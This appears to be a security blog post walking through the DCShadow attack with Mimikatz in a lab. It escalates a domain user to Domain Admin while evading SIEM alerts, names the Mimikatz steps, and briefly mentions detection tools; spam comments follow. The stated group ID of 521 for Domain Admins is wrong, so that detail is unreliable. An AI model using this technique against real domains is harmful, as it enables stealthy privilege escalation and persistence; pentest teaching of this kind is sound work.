Active Directory Attack - DCShadow

DCShadow is a new feature in Mimikatz located in the lsadump module. It simulates the behavior of a Domain Controller (using protocols like RPC used only by DC) to inject its own data, bypassing most of the common security controls and including your SIEM. DCShadow is sneaky attack technique in the post exploitation phase in Internal Pentest. In simple words, if you already compromised Domain Admin and some regular domain users in SIEM monitored network then using this attack (DCShadow) you can bypass alerts getting triggered and maintain persistence.
Lets demo this attack in our lab setup. As we can see from below screenshot we got access to two users. (pc - Domain Admin and Victim1 - Domain User)

Download the fresh copy of Mimikatz and transfer to the compromised workstation. Open the CMD  (window-1) with with system privileges. Use !+ to register service and start with system privileges. Then use !processtoken to steal SYSTEM token from service running to fake Domain Controller.

So what evil we can think of now ? Changing the user 's privileges from Domain User to Domain Admin ;) Lets change the primaryGroupID of victim1 to 521 (Domain Admin)

Note : You can modify any User Attributes inside Active Directory using above attack.

In CMD (window-1) type below command to modify primaryGroupID of Victim1.

Open one more CMD (window-2) with Domain Admin privileges. And type below command to push changes to Domain Controller.

Seems everything worked fine. Lets verify did the group membership for Victim1 changed or not ?

Voila !! Victim1 is now the "Domain Admins" member with generating minimal or zero alerts on the network.

Below chart shows the feature which Mimikatz can abuse using above attack technique. (We abused first feature :- Modify existing objects)

Is there any way to detect this attack ? Yes there is powershell script (proof of concept) by name UnCoverDCShadow can generate the alerts for this attack from any domain connected machine. Also there are some rules released for Suricata.

Reference :-


  1. Usually I never comment on blogs but your blog is so realistic that I cannot stop myself to say about it. You’re doing a great job, Very informative blog with lots of facts. Keep it up.
    Regards Security Guards Los Angeles

  2. It's very useful blog post with informative and insightful content and i had good experience with this information.I have gone through CRS Info Solutions Home which really nice. Learn more details About Us of CRS info solutions. Here you can see the Courses CRS Info Solutions full list. Find Student Registration page and register now. Go through Blog post of crs info solutions. I just read these Reviews of crs really great. You can now Contact Us of crs info solutions. You enroll for Pega Training at crs info solutions.

  3. Great Article Cyber Security Projects projects for cse Networking Security Projects JavaScript Training in Chennai JavaScript Training in Chennai The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

  4. Excellent blog thanks for sharing the valuable becomes easy to read and easily understand the information.
    Useful article which was very helpful. also interesting and contains good information.
    to know about python training course , use the below link.

    Python Training in chennai

    Python Course in chennai


Post a comment

Popular posts